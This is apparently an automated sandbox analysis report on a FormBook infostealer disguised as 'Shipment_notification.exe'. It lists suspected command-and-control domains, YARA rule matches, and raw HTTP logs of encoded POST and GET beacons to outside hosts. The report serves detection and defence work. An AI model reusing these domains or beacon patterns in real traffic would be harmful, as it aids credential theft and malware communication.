          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/Q
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.locationsbormes.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.locationsbormes.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com/rs5b/%
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peramid.xyz
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peramid.xyz/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piergitarshoes.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piergitarshoes.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rubyidentity.space
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rubyidentity.space/rs5b/
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com.Y
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comz
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starauctioneerspro.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starauctioneerspro.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcatelier.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcatelier.com/rs5b/
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com/rs5b/Pr
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnv
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnx
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zzxiaoyuan.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zzxiaoyuan.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zzxiaoyuan.com/rs5b/1
          Source: 10W12dX.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 10W12dX.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 10W12dX.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 10W12dX.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: control.exe, 00000004.00000002.583265968.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000004.00000002.582622308.000000000583E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.drkathleensanders.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.drkathleensanders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drkathleensanders.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
          Source: unknownDNS traffic detected: queries for: www.emagrecarapido.store
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.isabellagambitta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.drkathleensanders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.carcosainvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.piergitarshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.ywtxsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.peramid.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.locationsbormes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Shipment_notification.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 0_2_00A7C8440_2_00A7C844
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 0_2_00A7F1E80_2_00A7F1E8
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 0_2_00A7F1F80_2_00A7F1F8
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004038532_2_00403853
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0042202A2_2_0042202A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0042309D2_2_0042309D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004229D02_2_004229D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004222002_2_00422200
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00421A3A2_2_00421A3A
